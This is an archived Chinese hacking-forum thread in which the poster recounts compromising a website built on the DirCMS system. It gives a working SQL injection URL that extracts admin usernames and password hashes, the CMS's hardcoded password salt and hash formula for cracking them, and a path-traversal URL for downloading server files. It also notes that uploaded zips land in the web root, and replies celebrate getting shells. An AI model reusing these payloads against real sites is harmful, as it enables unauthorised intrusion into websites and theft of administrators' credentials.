Select Browser Mobile | Continue

Silic Group Froum Archive - Silic Security

 Forgot Password?
 Join Us
Search
Show: 2487|Reply: 14

[原创] 易创dircms建站系统SQL注入&&密码解密

  [Copy URL]
Posted 2016-2-12 23:11:18 | Show all replies |Read Mode
习科论坛五桶交流群轮了个站。。。时间居然长于5分钟。。新年没有新帖子,于是我写写过程吧

如果你访问/admin.php看到的是这样的后台:

后台.png

那么这个网站的程序应该就是易创dircms建站系统(开发者以前的域名好像关闭了)

于是发觉留言板有注入漏洞:
  1. /guestbook/?id=2+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),0x3a,(select+concat(userid,0x3a,username,0x3a,password)+from+dircms_admin+limit+0,1),0x3a)a+from+information_schema.tables+group+by+a)b%23
Copy

这个网站有三十多个用户,没有一个用户的密码能解开。。。
于是研究它的加密方式:
拿password作为关键字,发现如下代码:
  1. $admininfo['password']=preg_match('/[a-z0-9_]{3,25}/i',$admininfo['password'])?PWD($admininfo['password']):'';
Copy

这里面有个自定义加密函数PWD,于是以"function PWD"为关键字继续搜索,在global目录下有如下代码
  1. // 密码加密[双层md5加密]
  2. function PWD($pwd)
  3. {
  4. return md5(md5(PASSWORD_KEY).PASSWORD_KEY.md5(trim($pwd)));
  5. }
Copy

双层md5不稀奇,但是这里面多了一个PASSWORD_KEY的自定义salt。。。
继续搜,搜索到config文件中:
  1. define('PASSWORD_KEY', 'o2aeyMl84e'); //会员密码密钥,为了加强密码强度防止暴力破解,不可更改
Copy

那么加密方式就简单了:字符串a82327c51e146224c5377fec2e8c874ao2aeyMl84e+管理员密码的md5
然后再md5一次,去掉各种量代码就是:
  1. md5('a82327c51e146224c5377fec2e8c874ao2aeyMl84e'.md5(password));
Copy

这种加密cmd5可以解(但是我选择加密方式后,一直提示我密文错误 - -!)
其实我是用passwordpro跑的,可以去习科兵器库下载...

password.png

登陆后台有一万种方法拿权限。
后台插件模板,上传zip无论系统提示成功还是失败,都是直接解压在网站根目录的..还有很多配置信息,都是写在config文件的,下套程序看看就知道了。。。如果不想下程序看代码。。
  1. /admin.php?file=db&action=down&filename=../../admin.php
Copy

这个总该懂吧。。。问题太多了
over...
//Silic.Org
CMSteam The user has been deleted
Posted 2016-2-12 23:13:37 | Show all replies
确实,,老大给我加点币
flowstone The user has been deleted
Posted 2016-2-12 23:17:18 | Show all replies
老大,牛掰。。。
圣路西法 The user has been deleted
Posted 2016-2-12 23:29:15 | Show all replies
这个过程值得学习一下。
mynccs The user has been deleted
Posted 2016-2-13 07:57:51 | Show all replies
思路很好,值得学习
枫叶 The user has been deleted
Posted 2016-2-13 11:09:50 | Show all replies
你那注入语句愣是没看懂
Shrek The user has been deleted
Posted 2016-2-13 16:07:30 | Show all replies
有点儿深奥,小菜表示看不懂
流弊的小牛 The user has been deleted
Posted 2016-2-13 16:44:38 | Show all replies
我已经getshell了 , 学习了许多东西 老大
four The user has been deleted
Posted 2016-2-14 12:29:56 | Show all replies
学习完毕 鉴定完毕
annabelle The user has been deleted
Posted 2016-2-16 14:03:53 | Show all replies
最讨厌这种站了,开发个cms后面还关站。日起来蛋疼,站长用起来头疼。
Kav The user has been deleted
Posted 2016-2-17 11:11:55 | Show all replies
你那注入语句愣是没看懂
完美剿灭OVG The user has been deleted
Posted 2016-2-23 10:25:00 | Show all replies
我想问下师说CMS怎么弄?
Star The user has been deleted
Posted 2016-5-21 18:11:40 | Show all replies
老大,我记得以前有个加飞币买邀请码邀请人的帖子,找不到了,以前给我的飞币我还倒贴了50买邀请码给真正热爱技术想来习科的人,现在飞币不多了,遇到几个想来的,请老大赐我可以买5个码的币!感谢!
竹影幽灵 The user has been deleted
Posted 2016-7-1 10:19:05 | Show all replies
学到一招
1669178846 The user has been deleted
Posted 2016-7-7 09:59:04 | Show all replies
这思路好,收藏了
You need to login before reply! Login | Join Us

Credit Rules of This Forum

Close

公告Privious /1 Next

小黑屋|手机版|Archiver|Silic Security

GMT+8, 2020-8-13 16:10

© 2001-2014 Silic Corp.

Quick Reply Top Return List